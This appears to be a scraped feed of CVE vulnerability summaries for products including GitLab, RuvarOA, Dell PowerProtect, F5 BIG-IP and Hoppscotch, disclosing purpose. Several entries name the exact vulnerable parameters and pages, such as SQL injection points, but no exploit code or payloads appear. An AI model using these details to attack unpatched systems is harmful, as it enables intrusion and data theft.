CVE-2023-6195Gitlab reports: ReDoS in branch search when using wildcards ReDoS in markdown render pipeline Redos on Discord integrations Redos on Google Chat Integration Denial of Service Attack via Pin Menu DoS by filtering tags and branches via the API MR approval via CSRF in SAML SSO Banned user from groups can read issues updates via the api Require confirmation before linking JWT identity View confidential issues title and description of any public project via export SSRF via Github importer
CVE-2024-34257TOTOLINK EX1800T V9.1.0cu.2112_B20220316 has a vulnerability in the apcliEncrypType parameter that allows unauthorized execution of arbitrary commands, allowing an attacker to obtain device administrator privileges.
CVE-2024-34244libmodbus v3.1.10 is vulnerable to Buffer Overflow via the modbus_write_bits function. This issue can be triggered when the function is fed with specially crafted input, which leads to out-of-bounds read and can potentially cause a crash or other unintended behaviors.
CVE-2024-33382An issue in Open5GS v.2.7.0 allows an attacker to cause a denial of service via the 64 unsuccessful UE/gnb registration
CVE-2024-25533Error messages in RuvarOA v6.01 and v12.01 were discovered to leak the physical path of the website (/WorkFlow/OfficeFileUpdate.aspx). This vulnerability can allow attackers to write files to the server or execute arbitrary commands via crafted SQL statements.
CVE-2024-25532RuvarOA v6.01 and v12.01 were discovered to contain a SQL injection vulnerability via the bt_id parameter at /include/get_dict.aspx.
CVE-2024-25528RuvarOA v6.01 and v12.01 were discovered to contain a SQL injection vulnerability via the id parameter at /PersonalAffair/worklog_template_show.aspx.
CVE-2024-31961A SQL injection vulnerability in unit.php in Sonic before 3.1.3 allows remote attackers to execute arbitrary SQL commands via the level2 parameter.
CVE-2024-28971Dell Update Manager Plugin, versions 1.4.0 through 1.5.0, contains a Plain-text Password Storage Vulnerability in Log file. A remote high privileged attacker could potentially exploit this vulnerability, leading to the disclosure of certain user credentials. The attacker may be able to use the exposed credentials to access the vulnerable application with privileges of the compromised account.
CVE-2024-25531RuvarOA v6.01 and v12.01 were discovered to contain a SQL injection vulnerability via the PageID parameter at /WebUtility/SearchCondiction.aspx.
CVE-2024-25530RuvarOA v6.01 and v12.01 were discovered to contain a SQL injection vulnerability via the PageID parameter at /WebUtility/get_find_condiction.aspx.
CVE-2024-25529RuvarOA v6.01 and v12.01 were discovered to contain a SQL injection vulnerability via the id parameter at /WorkFlow/wf_office_file_history_show.aspx.
CVE-2024-25527RuvarOA v6.01 and v12.01 were discovered to contain a SQL injection vulnerability via the id parameter at /PersonalAffair/worklog_template_show.aspx.
CVE-2024-24908Dell PowerProtect DM5500 version and prior contain an Arbitrary File Delete via Path Traversal vulnerability. A remote attacker with high privileges could potentially exploit this vulnerability to deletion of arbitrary files stored on the server filesystem.
CVE-2024-24788A malformed DNS message in response to a query can cause the Lookup functions to get stuck in an infinite loop.
CVE-2024-24787On Darwin, building a Go module which contains CGO can trigger arbitrary code execution when using the Apple version of ld, due to usage of the -lto_library flag in a "#cgo LDFLAGS" directive.
CVE-2024-22460Dell PowerProtect DM5500 version and prior contains an insecure deserialization Vulnerability. A remote attacker with high privileges could potentially exploit this vulnerability, leading to arbitrary code execution on the vulnerable application.
CVE-2024-4654A vulnerability was found in BlueNet Technology Clinical Browsing System 1.2.1. It has been classified as critical. This affects an unknown part of the file /xds/cloudInterface.php. The manipulation of the argument INSTI_CODE leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-263499.
CVE-2024-4653A vulnerability was found in BlueNet Technology Clinical Browsing System 1.2.1 and classified as critical. Affected by this issue is some unknown functionality of the file /xds/outIndex.php. The manipulation of the argument name leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-263498 is the identifier assigned to this vulnerability.
CVE-2024-3951PTC Codebeamer is vulnerable to a cross site scripting vulnerability that could allow an attacker to inject and execute malicious code.
CVE-2024-34347@hoppscotch/cli is a CLI to run Hoppscotch Test Scripts in CI environments. Prior to 0.8.0, the @hoppscotch/js-sandbox package provides a Javascript sandbox that uses the Node.js vm module. However, the vm module is not safe for sandboxing untrusted Javascript code. This is because code inside the vm context can break out if it can get a hold of any reference to an object created outside of the vm. In the case of @hoppscotch/js-sandbox, multiple references to external objects are passed into the vm context to allow pre-request scripts interactions with environment variables and more. But this also allows the pre-request script to escape the sandbox. This vulnerability is fixed in 0.8.0.
CVE-2024-33612An improper certificate validation vulnerability exists in BIG-IP Next Central Manager and may allow an attacker to impersonate an Instance Provider system. A successful exploit of this vulnerability can allow the attacker to cross a security boundary. Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated.
CVE-2024-33608When IPsec is configured on a virtual server, undisclosed traffic can cause the Traffic Management Microkernel (TMM) to terminate. Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated.
CVE-2024-33604A reflected cross-site scripting (XSS) vulnerability exist in undisclosed page of the BIG-IP Configuration utility that allows an attacker to run JavaScript in the context of the currently logged-in user. Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated
CVE-2024-32980Spin is the developer tool for building and running serverless applications powered by WebAssembly. Prior to 2.4.3, some specifically configured Spin applications that use `self` requests without a specified URL authority can be induced to make requests to arbitrary hosts via the `Host` HTTP header. The following conditions need to be met for an application to be vulnerable: 1. The environment Spin is deployed in routes requests to the Spin runtime based on the request URL instead of the `Host` header, and leaves the `Host` header set to its original value; 2. The Spin application's component handling the incoming request is configured with an `allow_outbound_hosts` list containing `"self"`; and 3. In reaction to an incoming request, the component makes an outbound request whose URL doesn't include the hostname/port. Spin 2.4.3 has been released to fix this issue.
CVE-2024-32761Under certain conditions, a potential data leak may occur in the Traffic Management Microkernels (TMMs) of BIG-IP tenants running on VELOS and rSeries platforms. However, this issue cannot be exploited by an attacker because it is not consistently reproducible and is beyond an attacker's control. Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated